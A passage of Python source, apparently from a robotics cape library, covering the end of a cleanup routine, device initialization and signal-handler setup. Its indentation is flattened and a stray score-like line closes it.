atexit.unregister(cleanup)
warnings.warn('> Robotics cape exited cleanly')
raise KeyboardInterrupt()
# initialize cape
initialize()
# set initial state
set_state(PAUSED)
warnings.warn('> Robotics cape initialized')
# make sure it is disabled when exiting cleanly
import atexit; atexit.register(cleanup)
if 'RCPY_NO_HANDLERS' in os.environ:
warnings.warn('> RCPY_NO_HANDLERS is set. User is responsible for handling signals')
else:
# install handler
warnings.warn('> Installing signal handlers')
signal.signal(signal.SIGINT, handler)
signal.signal(signal.SIGTERM, handler)
| 2.25 | 2 |